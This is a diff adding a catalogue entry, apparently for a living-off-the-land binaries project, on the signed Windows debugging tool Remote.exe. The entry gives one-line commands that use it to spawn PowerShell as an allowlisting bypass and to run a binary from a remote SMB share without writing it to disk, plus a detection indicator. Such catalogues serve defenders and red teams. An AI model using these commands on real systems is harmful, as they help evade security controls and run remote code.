diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml new file mode 100644 index 0000000..8e7a935 --- /dev/null +++ b/yml/OtherMSBinaries/Remote.yml @@ -0,0 +1,43 @@ +--- +Name: Remote.exe +Description: Debugging tool included with Windows Debugging Tools +Author: mr.d0x +Created: 1/6/2021 +Commands: + - Command: Remote.exe /s "powershell.exe" anythinghere + Description: Spawns powershell as a child process of remote.exe + Usecase: Executes a process under a trusted Microsoft signed binary + Category: AWL Bypass + Privileges: User + MitreID: + MitreLink: + OperatingSystem: + - Command: Remote.exe /s "powershell.exe" anythinghere + Description: Spawns powershell as a child process of remote.exe + Usecase: Executes a process under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: + - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere + Description: Run a remote file + Usecase: Executing a remote binary without saving file to disk + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: +Full_Path: + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe +Code_Sample: + - Code: +Detection: + - IOC: remote.exe spawned +Resources: + - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ +Acknowledgement: + - Person: mr.d0x + Handle: '@mrd0x' +---